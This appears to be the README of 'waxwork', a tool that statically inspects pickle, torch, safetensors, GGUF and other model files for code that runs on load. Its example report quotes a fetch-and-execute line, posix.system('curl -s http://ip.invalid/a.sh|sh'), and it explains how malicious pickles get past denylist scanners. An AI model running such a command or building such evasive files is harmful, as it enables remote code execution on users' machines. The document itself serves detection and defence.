What a model file does when you load it.
A waxwork has a person's face and none of their insides. So does a file that looks like a pile of numbers and is a program.
[HIDES ] 1 pickle sits where a scanner will not look for one
archive/README.txt a pickle, and its extension is .txt
The scanners for this format choose which members of an
archive to open by their file extension. torch does not: it
reads whatever the pickle inside it points at. A pickle under
a name the scanner does not recognise is CVE-2025-1889, and it
was still being reported in 2025.
[RUNS ] 1 call is made that is not part of loading a model
posix.system runs a command through the shell, by the
name os has on Linux and Mac
posix.system('curl -s http://ip.invalid/a.sh|sh')
Every one of these happens when the file is loaded. There is
no flag for it and no sandbox in the way: unpickling is
running the instructions in the file.
[NOTE ] 5 calls are the ordinary machinery of loading a tensor
collections.OrderedDict (3) a dictionary that remembers its order
torch._utils._rebuild_tensor_v2 (2)
makes a tensor out of a storage
A .pt is a pickle, and a pickle is not data. It is a program.
Pickle is a stack machine. It has an instruction that imports any name in
Python and an instruction that calls it, and torch.load runs them, because
running them is what loading is. There is no setting for not running them.
weights_only=True exists and helps, and it is not the default everywhere,
and it is not what happens when somebody clicks a model in a user interface.
So a file that is supposed to be a few hundred megabytes of floating point numbers can, with about forty bytes at the front of it, run a shell command first. People download these the way they download a JPEG.
picklescan, which Hugging Face runs on everything uploaded, and ProtectAI's modelscan. Both work the same way: they hold a list of names that are not allowed, and pass anything else.
That list can never be finished, and 2025 was a bad year for it. JFrog published three ways past it:
- A pickle inside the archive under an extension the scanner does not recognise is never opened, because it decides what to look at by the file name. torch does not. (CVE-2025-1889)
- A member whose checksum does not match makes Python's
zipfileraise, so the scanner cannot read it. torch's own reader never checks the checksum, so it loads. The file breaks the scanner and works fine. - A subclass of a forbidden name is not that name, so the check by exact string does not fire.
There is academic work from August 2025 saying the same thing in general: a denylist is got round by calling something that is not on it, or by reaching what is on it indirectly.
The direction of the list is the bug. A list of what is forbidden fails open: anything it has not heard of is called clean. That is the wrong way for a list to fail.
It runs the pickle without running it.
The unpickler in Python is a loop over the opcodes with a real stack and real
objects, and when it reaches a REDUCE it calls the thing. This is that loop
with the calling taken out. A REDUCE pushes a note saying what would have
been called and with which arguments, and the note goes on the stack where
the result would have gone. At the end you have the whole object graph the
file describes, and every call it makes, and what each call was passed.
Then it prints them. There is no list of forbidden names anywhere in it.
There is a list of what is ordinary: _rebuild_tensor_v2, OrderedDict,
numpy.dtype, the thirty-odd torch storage types. Anything outside it goes
in the report. That list failing open means being noisy about something
harmless. Failing open in the other direction means being quiet about
something that is not.
A call whose result is thrown away. Every instruction in a pickle runs,
so a REDUCE followed by a POP has still made the call. Honest code has no
reason to compute something and discard it. A payload has every reason: it
puts the call somewhere a reader walking the finished object will never
arrive. This reports it because it knows what the returned object contains,
not because it recognised anything.
A name that is not in the file as text. STACK_GLOBAL takes the module
and the name off the stack, so they can be assembled from pieces or read back
out of the memo. Searching the bytes for the name of a function finds
nothing, and the import happens anyway. It says so.
A name that is not in the file at all. EXT1 asks the copyreg extension
registry for entry 42, and what that resolves to lives in the program doing
the loading.
Something called that was itself produced by a call. getattr(x, 'y')(z)
never names what it ends up calling.
Everything is decided by what is in the file, never by what it is called.
A .bin on Hugging Face is a pickle; the .bin beside it is safetensors.
| pickle | protocol 0 to 5, all of them, including several in a row |
| torch | the zip format and the old bare-pickle one, every member sniffed |
| safetensors | nothing to run, and three ways the header can still lie |
| GGUF | nothing to run, and a Jinja2 chat template that is rendered later |
| numpy | .npy, and the object arrays whose body is a pickle |
| Keras | .keras, and the configuration inside a .h5 |
| gzip | anything above, squashed |
Beyond the pickle itself it also asks: is there Python source in this archive
(a TorchScript file carries .py and torch.jit.load compiles it); does the
same name appear twice in the zip; does the name of the file match its
contents; does it use an opcode from a later protocol than it declares.
For safetensors, which has no instructions at all, the questions are about the header: bytes in the data block that no tensor claims, two tensors pointing at the same bytes, a shape and a type that do not add up to the space reserved, and a key that appears twice in the JSON where no two parsers have to agree which one wins. Four real models were checked while this was being written, up to a distilbert of a quarter of a gigabyte, and every one packs its tensors end to end with not a byte spare.
For GGUF the interesting part is tokenizer.chat_template. It is Jinja2,
whatever serves the model renders it, and Jinja2 is a language rather than a
set of blanks. A template that only puts messages into text is reported as
what it is. One that reaches for __class__ or walks __subclasses__ is
reported as something else.
It never loads anything. No unpickling, no import, no call, nothing written, no socket. A test reads the source and fails the build if any of that appears.
It cannot tell you whether a file is malicious. A getattr in a pickle is
not proof of anything and plenty of honest libraries do odd things on the way
back from disk. What it can do is make sure that when you decide, you are
deciding with the instructions in front of you.
It does not read ONNX, and it says so rather than counting it clean. The configuration inside an HDF5 file is lifted out where it sits rather than by walking the format, which is a shortcut, and the report owns up to it every time it takes it.
It will be noisy about a library nobody thought to put on the ordinary list. That is the trade, and it is the right way round.
There is a ceiling on how many instructions it will read out of one pickle and on how much of one member of an archive it will decompress. Both are far past anything a real model needs, and a file that reaches either is reported as read up to that point rather than read.
waxwork model.pt one file
waxwork *.bin *.pkl several
waxwork --all model.pt every call and every member, not the first few
waxwork --ops model.pt the instructions themselves
waxwork --version
--ops prints the disassembly with a note against every instruction that
does something, and what the file returns at the end of it.
Exit codes, for a hook or a pipeline:
| Code | Meaning |
|---|---|
| 0 | nothing in here is an instruction |
| 1 | something in here is a decision rather than a fact |
| 2 | it could not read what it was given |
| 3 | it read some of it and says which part it could not |
go build
Go 1.26 or newer, nothing else. No dependencies, and a test that fails the build if one appears.
sh build.sh v1
builds the five packages the releases are made of.
- It never loads anything. Nothing is unpickled, imported, called or written. A test reads the source and fails the build if it learns how.
- It never runs anything and never opens a socket.
- It has no list of forbidden names, and a test reads the lists it does have to check they only say what is ordinary.
- It says what it could not read, rather than counting silence as a pass.
MIT.